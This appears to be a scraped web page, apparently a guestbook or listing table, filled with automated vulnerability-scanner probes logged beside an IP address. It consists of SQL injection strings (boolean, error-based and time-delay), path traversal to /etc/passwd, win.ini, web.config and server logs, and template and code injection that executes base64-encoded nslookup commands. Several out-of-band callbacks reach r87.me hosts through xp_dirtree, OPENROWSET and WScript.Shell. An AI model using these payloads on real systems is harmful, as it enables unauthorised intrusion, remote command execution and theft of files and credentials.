|
|
|
208.100.0.117 |
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcr3ziql-5x0dfhwlca2qf_uic4hfkam" & "cbg.r87.me").StdOut.ReadAll+ |
|
|
|
|
|
+gethostbyname(trim('lzwjvpavdckcscn64iojwit6ianvzxyq49j2zb-a'.'bt0.r87.me'));// |
|
|
|
|
|
+gethostbyname(trim('lzwjvpavdcyeqjpwdp5dejw941xvqdfjcuzanur0'.'cfo.r87.me'));// |
|
|
|
208.100.0.117 |
|
+print(int)0xFFF9999-68512;// |
|
|
|
|
|
+print(int)0xFFF9999-82562;// |
|
|
|
208.100.0.117 |
|
+response.write(268409241-40072)' |
|
|
|
|
|
+response.write(268409241-85173)' |
|
|
|
208.100.0.117 |
|
-1 AND 'NS='ss |
|
|
|
208.100.0.117 |
|
-1 AND 'NS='ss |
|
|
|
208.100.0.117 |
|
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 |
|
|
|
|
|
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 |
|
|
|
208.100.0.117 |
|
-1 OR 17-7=10 |
|
|
|
208.100.0.117 |
|
-1 OR 17-7=10 |
|
|
|
208.100.0.117 |
|
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) |
|
|
|
|
|
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 OR 1=1 |
|
|
|
208.100.0.117 |
|
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
|
|
|
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
|
208.100.0.117 |
|
-1 OR 2+595-595-1=0+0+0+1 -- |
|
|
|
1 |
|
-1 OR 2+917-917-1=0+0+0+1 |
|
|
|
1 |
|
-1 OR X='ss |
|
|
|
208.100.0.117 |
|
-1 OR X='ss |
|
|
|
208.100.0.117 |
|
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" |
(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"">
|
|
|
|
|
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" |
(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"">
|
|
|
208.100.0.117 |
|
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" |
|
|
|
|
|
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "1"="1 |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "1"="1 |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "1"="1 |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "1"="1 |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "ns"="ns |
|
|
|
208.100.0.117 |
|
-1" OR 1=1 OR "ns"="ns |
|
|
|
208.100.0.117 |
|
-1" OR 2+834-834-1=0+0+0+1 -- |
|
|
|
1 |
|
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 |
|
|
|
|
|
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 |
|
|
|
208.100.0.117 |
|
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
|
|
|
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
|
208.100.0.117 |
|
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
|
|
|
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR '1'='1 |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR '1'='1 |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR '1'='1 |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR '1'='1 |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR 'ns'='ns |
|
|
|
208.100.0.117 |
|
-1' OR 1=1 OR 'ns'='ns |
|
|
|
208.100.0.117 |
|
-1' OR 2+388-388-1=0+0+0+1 -- |
|
|
|
1 |
|
-1' OR 2+998-998-1=0+0+0+1 or '0JHcdNPc'=' |
|
|
|
1 |
|
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
|
|
|
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
|
208.100.0.117 |
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcmcr0yasxjfopq7-vblc_xejwqett9d'+'enc.r87.me')exec sp_executesql @r-- |
|
|
|
208.100.0.117 |
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcwynor9mvhuvti0sqnrkomx0v-kxnvh'+'tqg.r87.me')exec sp_executesql @r-- |
|
|
|
|
|
-1';exec('xp_dirtree ''\\lzwjvpavdc1fpfu08zyt4odykv6ibzeur3cowjvg'+'f8k.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
-1';exec('xp_dirtree ''\\lzwjvpavdcpjvyh5pnlbhr904sql-me0dhdoijhq'+'mt0.r87.me'+'\c$\a''')-- |
|
|
|
|
|
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1 |
|
|
|
|
|
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1 |
|
|
|
208.100.0.117 |
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd |
|
|
|
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd |
|
|
|
208.100.0.117 |
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini |
|
|
|
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini |
|
|
|
208.100.0.117 |
|
................windowswin.ini |
|
|
|
1 |
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd |
|
|
|
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd |
|
|
|
208.100.0.117 |
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini |
|
|
|
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini |
|
|
|
208.100.0.117 |
|
....//....//....//....//....//....//....//....//....//....//....//etc/passwd |
|
|
|
|
|
....//....//....//....//....//....//....//....//....//....//....//etc/passwd |
|
|
|
208.100.0.117 |
|
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini |
|
|
|
|
|
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini |
|
|
|
208.100.0.117 |
|
...//...//...//...//...//...//...//...//...//...//...//etc/passwd |
|
|
|
|
|
...//...//...//...//...//...//...//...//...//...//...//etc/passwd |
|
|
|
208.100.0.117 |
|
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini |
|
|
|
|
|
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini |
|
|
|
208.100.0.117 |
|
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini |
|
|
|
1 |
|
../../../../../../../../../../windows/win.ini |
|
|
|
1 |
|
../../../../../../../../../../windows/win.ini .jpg |
|
|
|
1 |
|
../../../../../../../../../../xampp/apache/logs/access.log |
|
|
|
|
|
../../../../../../../../../../xampp/apache/logs/access.log |
|
|
|
208.100.0.117 |
|
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini |
|
|
|
1 |
|
..\..\..\..\..\..\..\..\windows\win.ini |
|
|
|
1 |
|
/../../../../../../../../../../../etc/passwd |
|
|
|
|
|
/../../../../../../../../../../../etc/passwd |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../../etc/passwd |
|
|
|
|
|
/../../../../../../../../../../../etc/passwd |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../../etc/passwd .cfm |
|
|
|
|
|
/../../../../../../../../../../../etc/passwd .cfm |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../AppServ/Apache24/logs/access.log |
|
|
|
|
|
/../../../../../../../../../../AppServ/Apache24/logs/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../boot.ini |
|
|
|
|
|
/../../../../../../../../../../boot.ini |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../boot.ini .cfm |
|
|
|
|
|
/../../../../../../../../../../boot.ini .cfm |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../etc/httpd/logs/access.log |
|
|
|
|
|
/../../../../../../../../../../etc/httpd/logs/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../etc/httpd/logs/error.log |
|
|
|
|
|
/../../../../../../../../../../etc/httpd/logs/error.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../etc/httpd/logs/error_log |
|
|
|
|
|
/../../../../../../../../../../etc/httpd/logs/error_log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../opt/lampp/logs/access_log |
|
|
|
|
|
/../../../../../../../../../../opt/lampp/logs/access_log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../proc/self/fd/2 |
|
|
|
|
|
/../../../../../../../../../../proc/self/fd/2 |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../proc/self/fd/2 .cfm |
|
|
|
|
|
/../../../../../../../../../../proc/self/fd/2 .cfm |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../proc/version |
|
|
|
|
|
/../../../../../../../../../../proc/version |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../proc/version .cfm |
|
|
|
|
|
/../../../../../../../../../../proc/version .cfm |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/apache/access.log |
|
|
|
|
|
/../../../../../../../../../../var/log/apache/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/apache/error.log |
|
|
|
|
|
/../../../../../../../../../../var/log/apache/error.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/apache2/access.log |
|
|
|
|
|
/../../../../../../../../../../var/log/apache2/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/apache2/error.log |
|
|
|
|
|
/../../../../../../../../../../var/log/apache2/error.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/lighttpd/access.log |
|
|
|
|
|
/../../../../../../../../../../var/log/lighttpd/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../var/log/nginx/access.log |
|
|
|
|
|
/../../../../../../../../../../var/log/nginx/access.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../WEB-INF/web.xml |
|
|
|
|
|
/../../../../../../../../../../WEB-INF/web.xml |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../web.config |
|
|
|
|
|
/../../../../../../../../../../web.config |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../windows/iis6.log |
|
|
|
|
|
/../../../../../../../../../../windows/iis6.log |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../windows/win.ini |
|
|
|
|
|
/../../../../../../../../../../windows/win.ini |
|
|
|
208.100.0.117 |
|
/../../../../../../../../../../windows/win.ini .cfm |
|
|
|
|
|
/../../../../../../../../../../windows/win.ini .cfm |
|
|
|
208.100.0.117 |
|
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini |
|
|
|
1 |
|
///r87.com/?www.orlandovillas4u.com/ |
|
|
|
|
|
///r87.com/?www.orlandovillas4u.com/ |
|
|
|
208.100.0.117 |
|
//lzwjvpavdcmrfjemnjqmrurpunxdjncmvetpmnvahkg.r87.me |
|
|
|
|
|
//lzwjvpavdctawy7r45uhvogz9nxrhed735n8__fh9kw.r87.me |
|
|
|
208.100.0.117 |
|
//r87.com/?0x06E5FE |
|
|
|
|
|
//r87.com/?0x06E5FF |
|
|
|
208.100.0.117 |
|
//r87.com/?http://www.orlandovillas4u.com/ |
|
|
|
|
|
//r87.com/?http://www.orlandovillas4u.com/ |
|
|
|
208.100.0.117 |
|
//r87.com/n/j/?0x06E20F |
|
|
|
|
|
//r87.com/n/j/?0x06E211 |
|
|
|
208.100.0.117 |
|
//r87.com/n/n.css?0x06E1BC |
|
|
|
|
|
//r87.com/n/n.css?0x06E1BD |
|
|
|
208.100.0.117 |
|
//r87?com/? |
|
|
|
|
|
//r87?com/? |
|
|
|
208.100.0.117 |
|
/admin/add_neighborhood_process.cfm |
|
|
|
|
|
/admin/add_neighborhood_process.cfm |
|
|
|
208.100.0.117 |
|
/etc/passwd |
|
|
|
|
|
/etc/passwd |
|
|
|
208.100.0.117 |
|
/www.vulnweb.com |
|
|
|
1 |
|
/\r87.com/?www.orlandovillas4u.com/ |
|
|
|
|
|
/\r87.com/?www.orlandovillas4u.com/ |
|
|
|
208.100.0.117 |
|
1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ |
|
|
|
|
|
1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ |
|
|
|
208.100.0.117 |
|
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
|
|
|
|
|
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
|
|
|
208.100.0.117 |
|
1 ns=netsparker(0x06E1A6) |
|
|
|
|
|
1 ns=netsparker(0x06E1A7) |
|
|
|
208.100.0.117 |
|
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 |
|
|
|
|
|
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 |
|
|
|
208.100.0.117 |
|
1 WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
1 WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
1 waitfor delay '0:0:3' -- |
|
|
|
1 |
|
1 ����%2527%2522 |
|
|
|
1 |
|
1";expr 268409241 - 77834;" |
|
|
|
|
|
1";expr 268409241 - 8086;" |
|
|
|
208.100.0.117 |
|
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
|
|
|
|
|
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
|
|
|
208.100.0.117 |
|
1'" |
|
|
|
1 |
|
1'));SELECT pg_sleep(25)-- |
|
|
|
|
|
1'));SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1'))exec('xp_dirtree ''\\lzwjvpavdc4_yx5vsxydf4uvsvc6he5w4f1washj'+'mfi.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
1'))exec('xp_dirtree ''\\lzwjvpavdcm1kzu0wuez_-3yrvcr5kusqufqyquj'+'p1m.r87.me'+'\c$\a''')-- |
|
|
|
|
|
1');SELECT pg_sleep(25)-- |
|
|
|
|
|
1');SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1')exec('xp_dirtree ''\\lzwjvpavdcu7rvbkvnr5dlevsupvneqzyhdjus1q'+'q3s.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
1')exec('xp_dirtree ''\\lzwjvpavdczm4sc5iy-dickd4t-5ady6pnzrfefq'+'l9o.r87.me'+'\c$\a''')-- |
|
|
|
|
|
1';expr 268409241 - 22029;' |
|
|
|
208.100.0.117 |
|
1';expr 268409241 - 77064;' |
|
|
|
|
|
1';SELECT pg_sleep(25)-- |
|
|
|
|
|
1';SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1) exec('xp_dirtree ''\\lzwjvpavdc1sme2wywkljq0bf7taseytmnyqbvc8'+'x38.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
1) exec('xp_dirtree ''\\lzwjvpavdcwr641fqvsfzjod1sf2n26v0hreb90i'+'fye.r87.me'+'\c$\a''')-- |
|
|
|
|
|
1) WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
1) WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
1)) WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
1)) WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
|
|
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
208.100.0.117 |
|
1));SELECT pg_sleep(25)-- |
|
|
|
|
|
1));SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1))exec('xp_dirtree ''\\lzwjvpavdc8opjuagc0kmvpeeaqly27bcs0fkl0j'+'1ka.r87.me'+'\c$\a''')-- |
|
|
|
|
|
1))exec('xp_dirtree ''\\lzwjvpavdcxuvt_apwyvzcbljmc53wq7yobrvijz'+'yto.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
|
|
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
208.100.0.117 |
|
1);SELECT pg_sleep(25)-- |
|
|
|
|
|
1);SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1/../../../../../../../../../../../etc/passwd |
|
|
|
|
|
1/../../../../../../../../../../../etc/passwd |
|
|
|
208.100.0.117 |
|
1/../../../../../../../../../../boot.ini |
|
|
|
|
|
1/../../../../../../../../../../boot.ini |
|
|
|
208.100.0.117 |
|
12345'"\'\");|]* {
< >�''? |
�''?">
|
|
|
1 |
|
127.0.0.1/elmah |
|
|
|
|
|
127.0.0.1/elmah |
|
|
|
208.100.0.117 |
|
127.0.0.1/elmah.axd |
|
|
|
|
|
127.0.0.1/elmah.axd |
|
|
|
208.100.0.117 |
|
127.0.0.1/trace.axd |
|
|
|
|
|
127.0.0.1/trace.axd |
|
|
|
208.100.0.117 |
|
127.100.11.2/elmah |
|
|
|
|
|
127.100.11.2/elmah |
|
|
|
208.100.0.117 |
|
127.100.11.2/elmah.axd |
|
|
|
|
|
127.100.11.2/elmah.axd |
|
|
|
208.100.0.117 |
|
127.100.11.2/trace.axd |
|
|
|
|
|
127.100.11.2/trace.axd |
|
|
|
208.100.0.117 |
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdc1s6jzddumibnb9yg6bo4nyood_pzkq'+'h8w.r87.me')exec sp_executesql @r-- |
|
|
|
|
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcajzy2gn2bfycumlprzacdhgyr8e3h0'+'whg.r87.me')exec sp_executesql @r-- |
|
|
|
208.100.0.117 |
|
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
|
|
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
|
208.100.0.117 |
|
1;exec('xp_dirtree ''\\lzwjvpavdceetj_ara9qudgtgr-gbjo0hnc8cqbi'+'qhw.r87.me'+'\c$\a''')-- |
|
|
|
208.100.0.117 |
|
1;exec('xp_dirtree ''\\lzwjvpavdcxdrdj9i6qdsxllchdab_aukrglrb8l'+'mey.r87.me'+'\c$\a''')-- |
|
|
|
|
|
1;expr 268409241 - 10461;x |
|
|
|
|
|
1;expr 268409241 - 14918;x |
|
|
|
208.100.0.117 |
|
1;SELECT pg_sleep(25)-- |
|
|
|
|
|
1;SELECT pg_sleep(25)-- |
|
|
|
208.100.0.117 |
|
1acu4oxWD5Gd8K |
|
|
|
1 |
|
1some_inexistent_file_with_long_name .jpg |
|
|
|
1 |
|
4D4RaKHM'));select pg_sleep(9); -- |
|
|
|
1 |
|
62.106.91.181/elmah |
|
|
|
|
|
62.106.91.181/elmah |
|
|
|
208.100.0.117 |
|
62.106.91.181/elmah.axd |
|
|
|
|
|
62.106.91.181/elmah.axd |
|
|
|
208.100.0.117 |
|
62.106.91.181/trace.axd |
|
|
|
|
|
62.106.91.181/trace.axd |
|
|
|
208.100.0.117 |
|
933' |
|
|
|
1 |
|
;print(md5(acunetix_wvs_security_test)); |
|
|
|
1 |
|
<#assign x=268409241 - 20577>
${x?string["0"]} |
|
|
|
208.100.0.117 |
|
<#assign x=268409241 - 6461>
${x?string["0"]} |
|
|
|
|
|
<% response.write(268409241-63913) %> |
|
|
|
|
|
<% response.write(268409241-8922) %> |
|
|
|
208.100.0.117 |
|
<%- 268409241-44213 %> |
|
|
|
208.100.0.117 |
|
<%- 268409241-5580 %> |
|
|
|
|
|
<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkY3Z6eW15OXVodl8ybjBwM2ZzcGhmYnNnemh5YXg2ZHktdS5yODcubWU=','base64').toString()) %> |
|
|
|
208.100.0.117 |
|
<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkY3ZpMzQ0ZHYzbWFndV9rY3NlaW1nandrenJ1eTItcWtrOC5yODcubWU=','base64').toString()) %> |
|
|
|
|
|
<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgbHp3anZwYXZkY2Nrd291c3p4ZWhyaTExcHNkLWMtaXJkb2ZjZzF4M2w1ay5yODcubWU=')})).to_s}" %> |
">
|
|
|
208.100.0.117 |
|
<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgbHp3anZwYXZkY2xpZ3FfM2NqZDN3aDMxbGJ6anE5NmtneGN2dWVkOW5nay5yODcubWU=')})).to_s}" %> |
">
|
|
|
|
|
<%= "#{268409241-17493}" %> |
">
|
|
|
|
|
<%= "#{268409241-23638}" %> |
">
|
|
|
208.100.0.117 |
|
<%a style=x:expre/**/ssion(netsparker(0x06E356))> |
|
|
|
|
|
<%a style=x:expre/**/ssion(netsparker(0x06E357))> |
|
|
|
208.100.0.117 |
|
<%createobject("WScript.Shell").exec("nslookup lzwjvpavdc2qqglmgkbe9cjrnbkfzp7nuv3dfb3u" & "fre.r87.me").StdOut.ReadAll%> |
">
|
|
|
|
|
<%createobject("WScript.Shell").exec("nslookup lzwjvpavdcx8s30qvkqdj2e6y4jhykkyenf2bzw5" & "bmi.r87.me").StdOut.ReadAll%> |
">
|
|
|
208.100.0.117 |
|
gethostbyname(trim('lzwjvpavdc8zwn0eu7jl1ew8tllgdxskoycat_uj'.'ovy.r87.me'));//?> |
|
|
|
|
|
gethostbyname(trim('lzwjvpavdctqhxemdac9fxrcyx7wa0bfkpzgmtsy'.'ybs.r87.me'));//?> |
|
|
|
208.100.0.117 |
|
=(int)0xFFF9999-29225;//?> |
|
|
|
208.100.0.117 |
|
=(int)0xFFF9999-80836;//?> |
|
|
|
|
|
| |